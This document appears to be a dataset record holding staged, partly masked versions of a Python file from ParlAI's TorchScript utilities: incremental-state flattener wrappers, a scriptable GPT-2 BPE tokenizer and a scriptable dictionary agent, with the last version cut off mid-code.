"step-1": "<mask token>\n\n\nclass ModelIncrStateFlattener(BaseIncrStateFlattener):\n <mask token>\n\n def reorder_decoder_incremental_state(self, flat_incr_state: Dict[str,\n torch.Tensor], inds: torch.Tensor) ->Dict[str, torch.Tensor]:\n structured_incr_state = self._unflatten_incr_state(flat_incr_state)\n new_structured_incr_state = (self.module.\n reorder_decoder_incremental_state(incremental_state=\n structured_incr_state, inds=inds))\n return self._flatten_incr_state(new_structured_incr_state)\n\n def output(self, tensor: torch.Tensor) ->torch.Tensor:\n return self.module.output(tensor)\n\n\n@torch.jit.script\nclass ScriptableGpt2BpeHelper(object):\n \"\"\"\n Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.\n \"\"\"\n\n @classmethod\n def findall(cls, text: str) ->List[str]:\n \"\"\"\n Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.\n \"\"\"\n contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']\n tokens: List[str] = []\n idx = 0\n num_passes = 0\n while idx < len(text):\n num_passes += 1\n if num_passes > 10000:\n return [\n '*** Infinite loop in ScriptableGpt2BpeHelper.findall()! 
***'\n ]\n if text[idx] == \"'\":\n captured_suffix = False\n for ending in contraction_endings:\n if text[idx + 1:idx + 1 + len(ending)] == ending:\n tokens.append(\"'\" + ending)\n idx += 1 + len(ending)\n captured_suffix = True\n break\n if captured_suffix:\n continue\n if not text[idx].isspace() or text[idx] == ' ' and idx + 1 < len(\n text) and not text[idx + 1].isspace():\n if text[idx] == ' ':\n last_matching_idx = idx + 1\n else:\n last_matching_idx = idx\n if text[last_matching_idx].isalpha():\n while last_matching_idx + 1 < len(text) and text[\n last_matching_idx + 1].isalpha():\n last_matching_idx += 1\n elif text[last_matching_idx].isnumeric():\n while last_matching_idx + 1 < len(text) and text[\n last_matching_idx + 1].isnumeric():\n last_matching_idx += 1\n else:\n while last_matching_idx + 1 < len(text) and not text[\n last_matching_idx + 1].isspace() and not text[\n last_matching_idx + 1].isalpha() and not text[\n last_matching_idx + 1].isnumeric():\n last_matching_idx += 1\n tokens.append(text[idx:last_matching_idx + 1])\n idx = last_matching_idx + 1\n continue\n if idx + 1 < len(text) and text[idx + 1].isspace():\n last_space_idx = idx + 1\n while last_space_idx + 1 < len(text) and text[\n last_space_idx + 1].isspace():\n last_space_idx += 1\n if last_space_idx + 1 == len(text):\n tokens.append(text[idx:last_space_idx + 1])\n idx = last_space_idx + 1\n else:\n tokens.append(text[idx:last_space_idx])\n idx = last_space_idx\n continue\n if True:\n last_space_idx = idx\n while last_space_idx + 1 < len(text) and text[\n last_space_idx + 1].isspace():\n last_space_idx += 1\n tokens.append(text[idx:last_space_idx + 1])\n idx = last_space_idx + 1\n return tokens\n\n def __init__(self, add_prefix_space: bool, encoder: Dict[str, str],\n byte_encoder: Dict[int, str], fused_key_bpe_ranks: Dict[str, float],\n special_tokens: List[str]):\n self.add_prefix_space = add_prefix_space\n self.encoder = encoder\n self.decoder: Dict[str, str] = {}\n for k, v in 
self.encoder.items():\n self.decoder[v] = k\n self.byte_encoder = byte_encoder\n self.byte_decoder: Dict[str, int] = {}\n for k, v in self.byte_encoder.items():\n self.byte_decoder[v] = k\n self.bpe_ranks = fused_key_bpe_ranks\n self._special_tokens: Dict[str, int] = {}\n for st in special_tokens:\n self._special_tokens[st] = 1\n\n def encode(self, text: str) ->List[str]:\n \"\"\"\n Tokenize text.\n\n Checks for add_prefix_space; handles accordingly.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n if self.add_prefix_space:\n text = f' {text}'\n FINAL = 1\n SPLITABLE = 0\n pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]\n for special_token in self._special_tokens.keys():\n i = 0\n while i < len(pieces):\n subtext, status = pieces[i]\n if status == FINAL:\n i += 1\n continue\n split = subtext.split(special_token)\n if len(split) > 1:\n pieces.pop(i)\n for j, piece in enumerate(split):\n if j > 0:\n pieces.insert(i + j, (special_token, FINAL))\n pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))\n else:\n i += 1\n output: List[str] = []\n for piece, state in pieces:\n if state is FINAL:\n output.append(piece)\n else:\n output += self.helper_encode(piece)\n text = ''.join(output)\n return output\n\n def get_pairs(self, word: List[str]) ->List[Tuple[str, str]]:\n \"\"\"\n Return set of symbol pairs in a word.\n\n Word is represented as list of symbols (symbols being variable-length strings).\n\n :param word:\n word to symbolize\n\n :return pairs:\n set of tuples of symbols\n \"\"\"\n pairs: List[Tuple[str, str]] = []\n prev_char = word[0]\n for char in word[1:]:\n pairs.append((prev_char, char))\n prev_char = char\n return pairs\n\n def bpe(self, word: List[str]) ->List[str]:\n \"\"\"\n Convert token to BPE.\n\n :param word:\n list of tokens token to convert\n\n :return bpe_encoding:\n string bpe encoding\n \"\"\"\n pairs = self.get_pairs(word)\n if len(pairs) == 0:\n return word\n while True:\n min_rank = 
self.bpe_ranks.get('\\n'.join(pairs[0]), float('inf'))\n bigram = pairs[0]\n for pair in pairs[1:]:\n current_rank = self.bpe_ranks.get('\\n'.join(pair), float('inf')\n )\n if current_rank < min_rank:\n min_rank = current_rank\n bigram = pair\n if '\\n'.join(bigram) not in self.bpe_ranks:\n break\n first, second = bigram\n new_word: List[str] = []\n i = 0\n while i < len(word):\n found = False\n for j in range(i, len(word)):\n if word[j] == first:\n new_word.extend(word[i:j])\n i = j\n found = True\n break\n if not found:\n new_word.extend(word[i:])\n break\n if word[i] == first and i < len(word) - 1 and word[i + 1\n ] == second:\n new_word.append(first + second)\n i += 2\n else:\n new_word.append(word[i])\n i += 1\n word = new_word.copy()\n if len(word) == 1:\n break\n else:\n pairs = self.get_pairs(word)\n return word\n\n def helper_encode(self, text: str) ->List[str]:\n \"\"\"\n Tokenize text.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n bpe_tokens: List[str] = []\n for token in self.findall(text):\n byte_encoded: List[str] = []\n for b in token:\n byte_encoded.append(self.byte_encoder[ord(b)])\n encoded: List[str] = []\n for bpe_token in self.bpe(byte_encoded):\n encoded.append(self.encoder[bpe_token])\n bpe_tokens.extend(encoded)\n return bpe_tokens\n\n def decode(self, tokens: List[str]) ->str:\n \"\"\"\n Decode list of tokens into a text string.\n\n :param tokens:\n list of tokens\n\n :return text:\n decoded text\n \"\"\"\n output: List[str] = []\n accum: List[str] = []\n for token in tokens:\n if token in self._special_tokens:\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n accum.clear()\n output.append(token)\n else:\n accum.append(token)\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n text = ''.join(output)\n if self.add_prefix_space:\n assert text.startswith(' ')\n text = text.lstrip(' ')\n return text\n\n def helper_decode(self, tokens: List[str]) ->str:\n \"\"\"\n Decode list 
of tokens into text string.\n\n :param tokens:\n list of tokens\n\n :return:\n decoded text\n \"\"\"\n chars: List[str] = []\n for token in tokens:\n decoded_token = self.decoder[token]\n token_chars = self.utf8_chars(decoded_token)\n for char in token_chars:\n if not torch.jit.is_scripting():\n chars.extend(list(char))\n else:\n chars.append(char)\n decoded_chars: List[str] = []\n for char in chars:\n decoded_chars.append(chr(self.byte_decoder[char]))\n return ''.join(decoded_chars)\n\n def utf8_chars(self, s: str) ->List[str]:\n \"\"\"\n An implementation of UTF8 character iteration in TorchScript. There are no\n bitwise operations in torchscript, so we compare directly to integer values.\n There isn't a lot of validation, for instance if you pass in an improperly\n encoded string with an out-of-place continuation byte, or with a non-left-to-\n right byte order, you'll get unexpected results and likely throw. Torch itself\n takes in unicode strings and encodes them as UTF8, so that should be actively\n hard to do.\n\n The logic is simple: looking at the current start-of-character byte.\n If its high bit is 0, it's a 1-byte character. 
Otherwise, the number of\n bytes is the number of leading 1s in its binary representation, so\n find that number by comparing it directly to ints with the appropriate\n representation, then append that many bytes as a character and move past\n them to the next start byte.\n\n From pytext.torchscript.utils.\n \"\"\"\n chars: List[str] = []\n i = 0\n while i < len(s):\n byte = ord(s[i])\n if byte < 128:\n chars.append(s[i])\n i += 1\n else:\n if byte < 224:\n num_bytes = 2\n elif byte < 240:\n num_bytes = 3\n elif byte < 248:\n num_bytes = 4\n elif byte < 252:\n num_bytes = 5\n elif byte < 254:\n num_bytes = 6\n elif byte < 255:\n num_bytes = 7\n else:\n num_bytes = 8\n chars.append(s[i:i + num_bytes])\n i += num_bytes\n return chars\n\n\n@torch.jit.script\nclass ScriptableDictionaryAgent:\n \"\"\"\n Builds and/or loads a dictionary.\n\n All code is TorchScriptable.\n \"\"\"\n\n def __init__(self, null_token: str, end_token: str, unk_token: str,\n start_token: str, freq: Dict[str, int], tok2ind: Dict[str, int],\n ind2tok: Dict[int, str], bpe_add_prefix_space: bool, bpe_encoder:\n Dict[str, str], bpe_byte_encoder: Dict[int, str],\n fused_key_bpe_ranks: Dict[str, float], special_tokens: List[str]):\n self.null_token = null_token\n self.end_token = end_token\n self.unk_token = unk_token\n self.start_token = start_token\n self.freq = freq\n self.tok2ind = tok2ind\n self.ind2tok = ind2tok\n self._unk_token_idx = self.tok2ind[self.unk_token]\n self.bpe = ScriptableGpt2BpeHelper(add_prefix_space=\n bpe_add_prefix_space, encoder=bpe_encoder, byte_encoder=\n bpe_byte_encoder, fused_key_bpe_ranks=fused_key_bpe_ranks,\n special_tokens=special_tokens)\n\n def _word_lookup(self, key: str) ->int:\n \"\"\"\n Return index from token, or unk_token's index, or None.\n \"\"\"\n if key in self.tok2ind:\n return self.tok2ind[key]\n else:\n return self._unk_token_idx\n\n def _index_lookup(self, key: int) ->str:\n \"\"\"\n Return token from index, or unk_token.\n \"\"\"\n if key in 
self.ind2tok:\n return self.ind2tok[key]\n else:\n return self.unk_token\n\n def gpt2_tokenize(self, text: str):\n \"\"\"\n Tokenize using Gpt2 BPE tokenizer.\n \"\"\"\n return self.bpe_tokenize(text)\n\n def tokenize(self, text: str) ->List[str]:\n \"\"\"\n Return a sequence of tokens from the iterable.\n\n Also handles special tokens for some tokenizers\n \"\"\"\n word_tokens = self.gpt2_tokenize(text)\n return word_tokens\n\n def bpe_tokenize(self, text: str) ->List[str]:\n \"\"\"\n Return a sequence of BPE-tokens from the text.\n \"\"\"\n return self.bpe.encode(text)\n\n def txt2vec(self, text: str) ->List[int]:\n \"\"\"\n Convert a string to a vector (list of ints).\n\n First runs a sentence tokenizer, then a word tokenizer.\n \"\"\"\n itr: List[int] = []\n for token in self.tokenize(str(text)):\n itr.append(self._word_lookup(token))\n return itr\n\n def vec2txt(self, vector: List[int]) ->str:\n \"\"\"\n Convert a vector of IDs to a string.\n\n Converts a vector (iterable of ints) into a string, with each token separated by\n the delimiter (default ``' '``).\n \"\"\"\n tokens = [self._index_lookup(idx) for idx in vector]\n text = self.bpe.decode(tokens)\n return text\n",
"step-2": "<mask token>\n\n\nclass BaseIncrStateFlattener(nn.Module):\n <mask token>\n\n def __init__(self, module: nn.Module):\n super().__init__()\n self.module = module\n <mask token>\n\n def _flatten_incr_state(self, structured_incr_state: Dict[int, Dict[str,\n Dict[str, torch.Tensor]]]) ->Dict[str, torch.Tensor]:\n \"\"\"\n Flatten the input incremental state.\n\n For instance, structured_incr_state[0]['self_attn']['prev_key'] will be stored\n in flat_incr_state['layer_0__self_attn__prev_key'].\n \"\"\"\n flat_incr_state = {}\n for layer_idx, dict1 in structured_incr_state.items():\n for attn_type, dict2 in dict1.items():\n for state_type, state in dict2.items():\n key = f'{layer_idx:d}__{attn_type}__{state_type}'\n flat_incr_state[key] = state\n return flat_incr_state\n\n\nclass DecoderIncrStateFlattener(BaseIncrStateFlattener):\n \"\"\"\n Wrapper for a TransformerDecoder that will unflatten/flatten the incremental state.\n\n Unflattening/flattening will occur before passing the incremental state into and out\n of .forward().\n \"\"\"\n\n def forward(self, input_: torch.LongTensor, encoder_state: Tuple[torch.\n Tensor, torch.Tensor], flat_incr_state: Optional[Dict[str, torch.\n Tensor]]=None) ->Tuple[torch.Tensor, Dict[str, torch.Tensor]]:\n if flat_incr_state is not None:\n structured_incr_state = self._unflatten_incr_state(flat_incr_state)\n else:\n structured_incr_state = None\n tensor, new_structured_incr_state = self.module.forward(input=\n input_, encoder_state=encoder_state, incr_state=\n structured_incr_state)\n new_flat_incr_state = self._flatten_incr_state(\n new_structured_incr_state)\n return tensor, new_flat_incr_state\n\n\nclass ModelIncrStateFlattener(BaseIncrStateFlattener):\n \"\"\"\n Wrapper for a TransformerGeneratorModel to unflatten/flatten the incremental state.\n\n Unflattening/flattening will occur before passing the incremental state into and out\n of .reorder_decoder_incremental_state(). 
We also support .output(), which is also\n traced.\n \"\"\"\n\n def reorder_decoder_incremental_state(self, flat_incr_state: Dict[str,\n torch.Tensor], inds: torch.Tensor) ->Dict[str, torch.Tensor]:\n structured_incr_state = self._unflatten_incr_state(flat_incr_state)\n new_structured_incr_state = (self.module.\n reorder_decoder_incremental_state(incremental_state=\n structured_incr_state, inds=inds))\n return self._flatten_incr_state(new_structured_incr_state)\n\n def output(self, tensor: torch.Tensor) ->torch.Tensor:\n return self.module.output(tensor)\n\n\n@torch.jit.script\nclass ScriptableGpt2BpeHelper(object):\n \"\"\"\n Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.\n \"\"\"\n\n @classmethod\n def findall(cls, text: str) ->List[str]:\n \"\"\"\n Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.\n \"\"\"\n contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']\n tokens: List[str] = []\n idx = 0\n num_passes = 0\n while idx < len(text):\n num_passes += 1\n if num_passes > 10000:\n return [\n '*** Infinite loop in ScriptableGpt2BpeHelper.findall()! 
***'\n ]\n if text[idx] == \"'\":\n captured_suffix = False\n for ending in contraction_endings:\n if text[idx + 1:idx + 1 + len(ending)] == ending:\n tokens.append(\"'\" + ending)\n idx += 1 + len(ending)\n captured_suffix = True\n break\n if captured_suffix:\n continue\n if not text[idx].isspace() or text[idx] == ' ' and idx + 1 < len(\n text) and not text[idx + 1].isspace():\n if text[idx] == ' ':\n last_matching_idx = idx + 1\n else:\n last_matching_idx = idx\n if text[last_matching_idx].isalpha():\n while last_matching_idx + 1 < len(text) and text[\n last_matching_idx + 1].isalpha():\n last_matching_idx += 1\n elif text[last_matching_idx].isnumeric():\n while last_matching_idx + 1 < len(text) and text[\n last_matching_idx + 1].isnumeric():\n last_matching_idx += 1\n else:\n while last_matching_idx + 1 < len(text) and not text[\n last_matching_idx + 1].isspace() and not text[\n last_matching_idx + 1].isalpha() and not text[\n last_matching_idx + 1].isnumeric():\n last_matching_idx += 1\n tokens.append(text[idx:last_matching_idx + 1])\n idx = last_matching_idx + 1\n continue\n if idx + 1 < len(text) and text[idx + 1].isspace():\n last_space_idx = idx + 1\n while last_space_idx + 1 < len(text) and text[\n last_space_idx + 1].isspace():\n last_space_idx += 1\n if last_space_idx + 1 == len(text):\n tokens.append(text[idx:last_space_idx + 1])\n idx = last_space_idx + 1\n else:\n tokens.append(text[idx:last_space_idx])\n idx = last_space_idx\n continue\n if True:\n last_space_idx = idx\n while last_space_idx + 1 < len(text) and text[\n last_space_idx + 1].isspace():\n last_space_idx += 1\n tokens.append(text[idx:last_space_idx + 1])\n idx = last_space_idx + 1\n return tokens\n\n def __init__(self, add_prefix_space: bool, encoder: Dict[str, str],\n byte_encoder: Dict[int, str], fused_key_bpe_ranks: Dict[str, float],\n special_tokens: List[str]):\n self.add_prefix_space = add_prefix_space\n self.encoder = encoder\n self.decoder: Dict[str, str] = {}\n for k, v in 
self.encoder.items():\n self.decoder[v] = k\n self.byte_encoder = byte_encoder\n self.byte_decoder: Dict[str, int] = {}\n for k, v in self.byte_encoder.items():\n self.byte_decoder[v] = k\n self.bpe_ranks = fused_key_bpe_ranks\n self._special_tokens: Dict[str, int] = {}\n for st in special_tokens:\n self._special_tokens[st] = 1\n\n def encode(self, text: str) ->List[str]:\n \"\"\"\n Tokenize text.\n\n Checks for add_prefix_space; handles accordingly.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n if self.add_prefix_space:\n text = f' {text}'\n FINAL = 1\n SPLITABLE = 0\n pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]\n for special_token in self._special_tokens.keys():\n i = 0\n while i < len(pieces):\n subtext, status = pieces[i]\n if status == FINAL:\n i += 1\n continue\n split = subtext.split(special_token)\n if len(split) > 1:\n pieces.pop(i)\n for j, piece in enumerate(split):\n if j > 0:\n pieces.insert(i + j, (special_token, FINAL))\n pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))\n else:\n i += 1\n output: List[str] = []\n for piece, state in pieces:\n if state is FINAL:\n output.append(piece)\n else:\n output += self.helper_encode(piece)\n text = ''.join(output)\n return output\n\n def get_pairs(self, word: List[str]) ->List[Tuple[str, str]]:\n \"\"\"\n Return set of symbol pairs in a word.\n\n Word is represented as list of symbols (symbols being variable-length strings).\n\n :param word:\n word to symbolize\n\n :return pairs:\n set of tuples of symbols\n \"\"\"\n pairs: List[Tuple[str, str]] = []\n prev_char = word[0]\n for char in word[1:]:\n pairs.append((prev_char, char))\n prev_char = char\n return pairs\n\n def bpe(self, word: List[str]) ->List[str]:\n \"\"\"\n Convert token to BPE.\n\n :param word:\n list of tokens token to convert\n\n :return bpe_encoding:\n string bpe encoding\n \"\"\"\n pairs = self.get_pairs(word)\n if len(pairs) == 0:\n return word\n while True:\n min_rank = 
self.bpe_ranks.get('\\n'.join(pairs[0]), float('inf'))\n bigram = pairs[0]\n for pair in pairs[1:]:\n current_rank = self.bpe_ranks.get('\\n'.join(pair), float('inf')\n )\n if current_rank < min_rank:\n min_rank = current_rank\n bigram = pair\n if '\\n'.join(bigram) not in self.bpe_ranks:\n break\n first, second = bigram\n new_word: List[str] = []\n i = 0\n while i < len(word):\n found = False\n for j in range(i, len(word)):\n if word[j] == first:\n new_word.extend(word[i:j])\n i = j\n found = True\n break\n if not found:\n new_word.extend(word[i:])\n break\n if word[i] == first and i < len(word) - 1 and word[i + 1\n ] == second:\n new_word.append(first + second)\n i += 2\n else:\n new_word.append(word[i])\n i += 1\n word = new_word.copy()\n if len(word) == 1:\n break\n else:\n pairs = self.get_pairs(word)\n return word\n\n def helper_encode(self, text: str) ->List[str]:\n \"\"\"\n Tokenize text.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n bpe_tokens: List[str] = []\n for token in self.findall(text):\n byte_encoded: List[str] = []\n for b in token:\n byte_encoded.append(self.byte_encoder[ord(b)])\n encoded: List[str] = []\n for bpe_token in self.bpe(byte_encoded):\n encoded.append(self.encoder[bpe_token])\n bpe_tokens.extend(encoded)\n return bpe_tokens\n\n def decode(self, tokens: List[str]) ->str:\n \"\"\"\n Decode list of tokens into a text string.\n\n :param tokens:\n list of tokens\n\n :return text:\n decoded text\n \"\"\"\n output: List[str] = []\n accum: List[str] = []\n for token in tokens:\n if token in self._special_tokens:\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n accum.clear()\n output.append(token)\n else:\n accum.append(token)\n if len(accum) > 0:\n output.append(self.helper_decode(accum))\n text = ''.join(output)\n if self.add_prefix_space:\n assert text.startswith(' ')\n text = text.lstrip(' ')\n return text\n\n def helper_decode(self, tokens: List[str]) ->str:\n \"\"\"\n Decode list 
of tokens into text string.\n\n :param tokens:\n list of tokens\n\n :return:\n decoded text\n \"\"\"\n chars: List[str] = []\n for token in tokens:\n decoded_token = self.decoder[token]\n token_chars = self.utf8_chars(decoded_token)\n for char in token_chars:\n if not torch.jit.is_scripting():\n chars.extend(list(char))\n else:\n chars.append(char)\n decoded_chars: List[str] = []\n for char in chars:\n decoded_chars.append(chr(self.byte_decoder[char]))\n return ''.join(decoded_chars)\n\n def utf8_chars(self, s: str) ->List[str]:\n \"\"\"\n An implementation of UTF8 character iteration in TorchScript. There are no\n bitwise operations in torchscript, so we compare directly to integer values.\n There isn't a lot of validation, for instance if you pass in an improperly\n encoded string with an out-of-place continuation byte, or with a non-left-to-\n right byte order, you'll get unexpected results and likely throw. Torch itself\n takes in unicode strings and encodes them as UTF8, so that should be actively\n hard to do.\n\n The logic is simple: looking at the current start-of-character byte.\n If its high bit is 0, it's a 1-byte character. 
Otherwise, the number of\n bytes is the number of leading 1s in its binary representation, so\n find that number by comparing it directly to ints with the appropriate\n representation, then append that many bytes as a character and move past\n them to the next start byte.\n\n From pytext.torchscript.utils.\n \"\"\"\n chars: List[str] = []\n i = 0\n while i < len(s):\n byte = ord(s[i])\n if byte < 128:\n chars.append(s[i])\n i += 1\n else:\n if byte < 224:\n num_bytes = 2\n elif byte < 240:\n num_bytes = 3\n elif byte < 248:\n num_bytes = 4\n elif byte < 252:\n num_bytes = 5\n elif byte < 254:\n num_bytes = 6\n elif byte < 255:\n num_bytes = 7\n else:\n num_bytes = 8\n chars.append(s[i:i + num_bytes])\n i += num_bytes\n return chars\n\n\n@torch.jit.script\nclass ScriptableDictionaryAgent:\n \"\"\"\n Builds and/or loads a dictionary.\n\n All code is TorchScriptable.\n \"\"\"\n\n def __init__(self, null_token: str, end_token: str, unk_token: str,\n start_token: str, freq: Dict[str, int], tok2ind: Dict[str, int],\n ind2tok: Dict[int, str], bpe_add_prefix_space: bool, bpe_encoder:\n Dict[str, str], bpe_byte_encoder: Dict[int, str],\n fused_key_bpe_ranks: Dict[str, float], special_tokens: List[str]):\n self.null_token = null_token\n self.end_token = end_token\n self.unk_token = unk_token\n self.start_token = start_token\n self.freq = freq\n self.tok2ind = tok2ind\n self.ind2tok = ind2tok\n self._unk_token_idx = self.tok2ind[self.unk_token]\n self.bpe = ScriptableGpt2BpeHelper(add_prefix_space=\n bpe_add_prefix_space, encoder=bpe_encoder, byte_encoder=\n bpe_byte_encoder, fused_key_bpe_ranks=fused_key_bpe_ranks,\n special_tokens=special_tokens)\n\n def _word_lookup(self, key: str) ->int:\n \"\"\"\n Return index from token, or unk_token's index, or None.\n \"\"\"\n if key in self.tok2ind:\n return self.tok2ind[key]\n else:\n return self._unk_token_idx\n\n def _index_lookup(self, key: int) ->str:\n \"\"\"\n Return token from index, or unk_token.\n \"\"\"\n if key in 
self.ind2tok:\n return self.ind2tok[key]\n else:\n return self.unk_token\n\n def gpt2_tokenize(self, text: str):\n \"\"\"\n Tokenize using Gpt2 BPE tokenizer.\n \"\"\"\n return self.bpe_tokenize(text)\n\n def tokenize(self, text: str) ->List[str]:\n \"\"\"\n Return a sequence of tokens from the iterable.\n\n Also handles special tokens for some tokenizers\n \"\"\"\n word_tokens = self.gpt2_tokenize(text)\n return word_tokens\n\n def bpe_tokenize(self, text: str) ->List[str]:\n \"\"\"\n Return a sequence of BPE-tokens from the text.\n \"\"\"\n return self.bpe.encode(text)\n\n def txt2vec(self, text: str) ->List[int]:\n \"\"\"\n Convert a string to a vector (list of ints).\n\n First runs a sentence tokenizer, then a word tokenizer.\n \"\"\"\n itr: List[int] = []\n for token in self.tokenize(str(text)):\n itr.append(self._word_lookup(token))\n return itr\n\n def vec2txt(self, vector: List[int]) ->str:\n \"\"\"\n Convert a vector of IDs to a string.\n\n Converts a vector (iterable of ints) into a string, with each token separated by\n the delimiter (default ``' '``).\n \"\"\"\n tokens = [self._index_lookup(idx) for idx in vector]\n text = self.bpe.decode(tokens)\n return text\n",
"step-3": "<mask token>\n\n\nclass BaseIncrStateFlattener(nn.Module):\n <mask token>\n\n def __init__(self, module: nn.Module):\n super().__init__()\n self.module = module\n\n def _unflatten_incr_state(self, flat_incr_state: Dict[str, torch.Tensor]\n ) ->Dict[int, Dict[str, Dict[str, torch.Tensor]]]:\n \"\"\"\n Unflatten the input incremental state.\n\n For instance, flat_incr_state['layer_0__self_attn__prev_key'] will be stored in\n structured_incr_state[0]['self_attn']['prev_key'].\n \"\"\"\n structured_incr_state = defaultdict(lambda : defaultdict(dict))\n for key, state in flat_incr_state.items():\n layer_idx_str, attn_type, state_type = key.split('__')\n structured_incr_state[int(layer_idx_str)][attn_type][state_type\n ] = state\n return dict({k: dict(v) for k, v in structured_incr_state.items()})\n\n def _flatten_incr_state(self, structured_incr_state: Dict[int, Dict[str,\n Dict[str, torch.Tensor]]]) ->Dict[str, torch.Tensor]:\n \"\"\"\n Flatten the input incremental state.\n\n For instance, structured_incr_state[0]['self_attn']['prev_key'] will be stored\n in flat_incr_state['layer_0__self_attn__prev_key'].\n \"\"\"\n flat_incr_state = {}\n for layer_idx, dict1 in structured_incr_state.items():\n for attn_type, dict2 in dict1.items():\n for state_type, state in dict2.items():\n key = f'{layer_idx:d}__{attn_type}__{state_type}'\n flat_incr_state[key] = state\n return flat_incr_state\n\n\nclass DecoderIncrStateFlattener(BaseIncrStateFlattener):\n \"\"\"\n Wrapper for a TransformerDecoder that will unflatten/flatten the incremental state.\n\n Unflattening/flattening will occur before passing the incremental state into and out\n of .forward().\n \"\"\"\n\n def forward(self, input_: torch.LongTensor, encoder_state: Tuple[torch.\n Tensor, torch.Tensor], flat_incr_state: Optional[Dict[str, torch.\n Tensor]]=None) ->Tuple[torch.Tensor, Dict[str, torch.Tensor]]:\n if flat_incr_state is not None:\n structured_incr_state = self._unflatten_incr_state(flat_incr_state)\n 
else:\n structured_incr_state = None\n tensor, new_structured_incr_state = self.module.forward(input=\n input_, encoder_state=encoder_state, incr_state=\n structured_incr_state)\n new_flat_incr_state = self._flatten_incr_state(\n new_structured_incr_state)\n return tensor, new_flat_incr_state\n\n\nclass ModelIncrStateFlattener(BaseIncrStateFlattener):\n \"\"\"\n Wrapper for a TransformerGeneratorModel to unflatten/flatten the incremental state.\n\n Unflattening/flattening will occur before passing the incremental state into and out\n of .reorder_decoder_incremental_state(). We also support .output(), which is also\n traced.\n \"\"\"\n\n def reorder_decoder_incremental_state(self, flat_incr_state: Dict[str,\n torch.Tensor], inds: torch.Tensor) ->Dict[str, torch.Tensor]:\n structured_incr_state = self._unflatten_incr_state(flat_incr_state)\n new_structured_incr_state = (self.module.\n reorder_decoder_incremental_state(incremental_state=\n structured_incr_state, inds=inds))\n return self._flatten_incr_state(new_structured_incr_state)\n\n def output(self, tensor: torch.Tensor) ->torch.Tensor:\n return self.module.output(tensor)\n\n\n@torch.jit.script\nclass ScriptableGpt2BpeHelper(object):\n \"\"\"\n Version of parlai.utils.bpe.Gpt2BpeHelper that can be TorchScripted.\n \"\"\"\n\n @classmethod\n def findall(cls, text: str) ->List[str]:\n \"\"\"\n Split tokens in a manner that replicates parlai.utils.bpe.Gpt2BpeHelper.\n \"\"\"\n contraction_endings = ['s', 't', 're', 've', 'm', 'll', 'd']\n tokens: List[str] = []\n idx = 0\n num_passes = 0\n while idx < len(text):\n num_passes += 1\n if num_passes > 10000:\n return [\n '*** Infinite loop in ScriptableGpt2BpeHelper.findall()! 
***'\n ]\n if text[idx] == \"'\":\n captured_suffix = False\n for ending in contraction_endings:\n if text[idx + 1:idx + 1 + len(ending)] == ending:\n tokens.append(\"'\" + ending)\n idx += 1 + len(ending)\n captured_suffix = True\n break\n if captured_suffix:\n continue\n if not text[idx].isspace() or text[idx] == ' ' and idx + 1 < len(\n text) and not text[idx + 1].isspace():\n if text[idx] == ' ':\n last_matching_idx = idx + 1\n else:\n last_matching_idx = idx\n if text[last_matching_idx].isalpha():\n while last_matching_idx + 1 < len(text) and text[\n last_matching_idx + 1].isalpha():\n last_matching_idx += 1\n elif text[last_matching_idx].isnumeric():\n while last_matching_idx + 1 < len(text) and text[\n last_matching_idx + 1].isnumeric():\n last_matching_idx += 1\n else:\n while last_matching_idx + 1 < len(text) and not text[\n last_matching_idx + 1].isspace() and not text[\n last_matching_idx + 1].isalpha() and not text[\n last_matching_idx + 1].isnumeric():\n last_matching_idx += 1\n tokens.append(text[idx:last_matching_idx + 1])\n idx = last_matching_idx + 1\n continue\n if idx + 1 < len(text) and text[idx + 1].isspace():\n last_space_idx = idx + 1\n while last_space_idx + 1 < len(text) and text[\n last_space_idx + 1].isspace():\n last_space_idx += 1\n if last_space_idx + 1 == len(text):\n tokens.append(text[idx:last_space_idx + 1])\n idx = last_space_idx + 1\n else:\n tokens.append(text[idx:last_space_idx])\n idx = last_space_idx\n continue\n if True:\n last_space_idx = idx\n while last_space_idx + 1 < len(text) and text[\n last_space_idx + 1].isspace():\n last_space_idx += 1\n tokens.append(text[idx:last_space_idx + 1])\n idx = last_space_idx + 1\n return tokens\n\n def __init__(self, add_prefix_space: bool, encoder: Dict[str, str],\n byte_encoder: Dict[int, str], fused_key_bpe_ranks: Dict[str, float],\n special_tokens: List[str]):\n self.add_prefix_space = add_prefix_space\n self.encoder = encoder\n self.decoder: Dict[str, str] = {}\n for k, v in 
self.encoder.items():\n self.decoder[v] = k\n self.byte_encoder = byte_encoder\n self.byte_decoder: Dict[str, int] = {}\n for k, v in self.byte_encoder.items():\n self.byte_decoder[v] = k\n self.bpe_ranks = fused_key_bpe_ranks\n self._special_tokens: Dict[str, int] = {}\n for st in special_tokens:\n self._special_tokens[st] = 1\n\n def encode(self, text: str) ->List[str]:\n \"\"\"\n Tokenize text.\n\n Checks for add_prefix_space; handles accordingly.\n\n :param text:\n text to tokenize\n\n :return tokens:\n A list of tokens\n \"\"\"\n if self.add_prefix_space:\n text = f' {text}'\n FINAL = 1\n SPLITABLE = 0\n pieces: List[Tuple[str, int]] = [(text, SPLITABLE)]\n for special_token in self._special_tokens.keys():\n i = 0\n while i < len(pieces):\n subtext, status = pieces[i]\n if status == FINAL:\n i += 1\n continue\n split = subtext.split(special_token)\n if len(split) > 1:\n pieces.pop(i)\n for j, piece in enumerate(split):\n if j > 0:\n pieces.insert(i + j, (special_token, FINAL))\n pieces.insert(i + j + int(j > 0), (piece, SPLITABLE))\n else:\n i += 1\n output: List[str] = []\n for piece, state in pieces:\n if state is 